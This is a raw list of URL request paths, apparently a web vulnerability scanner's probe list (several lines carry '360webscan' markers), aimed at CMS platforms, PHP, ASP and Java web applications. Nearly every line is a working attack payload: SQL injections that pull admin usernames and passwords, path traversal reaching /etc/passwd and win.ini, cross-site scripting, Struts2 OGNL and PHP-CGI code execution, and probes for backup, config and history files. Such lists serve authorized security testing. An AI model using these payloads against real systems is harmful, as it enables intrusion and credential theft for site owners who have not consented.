/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/jsky_web_scanner_test_file.txt
/nosec_Web_Scanner_Test.dll
/
/wp-admin
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/admin.php
/dede/
/administrator/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/user
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/TRACE_test
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/TRACK_test
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/_vti_bin/_vti_adm/admin.dll
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/_vti_bin/_vti_aut/author.dll
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/_vti_bin/shtml.exe?_vti_rpc
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/server-info
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/server-status
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/jmx-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/webscan360noThisFile*~1*/.aspx
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/.../.../.../.../.../.../.../.../windows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/phpMyAdmin/show_config_errors.php
/etc/passwd
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/etc/passwd
/xampp/index.php
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/?search=just_test_not_find_href
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/$
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/solr/dev/admin/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/.../.../.../.../.../.../.../.../etc/passwd
/level/15/exec/-/show/running-config/CR
/plugins/weathermap/weathermap-cacti-plugin.php
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/icons/index
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/icons/small/index
/%3Cscript%3Ealert(42873).do
/
/%3Cscript%20s%3Ealert(42873)
/
/?%22onmouseover='prompt(42873)'bad=%22%3E
/
/%22%3E%3CsCrIpT%3Eprompt(42873)
/
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/
/'IHLD
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/
/
/install.php
/
/install/index.php
/
/fckeditor/editor/dialog/fck_about.html
/
/extras/curltest.php?url=file://curltest.php
/
/.svn/entries
/
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/
/plus/carbuyaction.php
/
/plus/carbuyaction.php?dopost=return&code=../../index
/
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/js/calendar.php?lang=../js
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
/plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
/index.php?ac=search&at=taglist&tagkey=a%2527
/wap/index.php?ac=search&at=taglist&tagkey=a%2527
/ckeditor/samples/sample_posteddata.php
/plus/carbuyaction.php?dopost=return&code=../../tags
/?cart-ajaxadd
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/index.php?ac=order&at=list
/ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
/ajax.php?act=verify_ecv&ecvsn=360scan%27
/include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
/m.php?m=User&a=doLogin
/api.php?act=1&appname=../../core/html/pages/about.html%00
/ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
/message.php?act=webscan'
/link.php?act=go&url=webscan.cn'
/showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
/showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
/include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
/plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
/group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
/admin_aspcms/_content/_tag/aspcms_tag.asp
/admin_aspcms/index.asp
/admin_aspcms/_style/aspcms_stylefun.asp?action=edit
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
/resin-doc/viewfile/?file=index.jsp
/portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
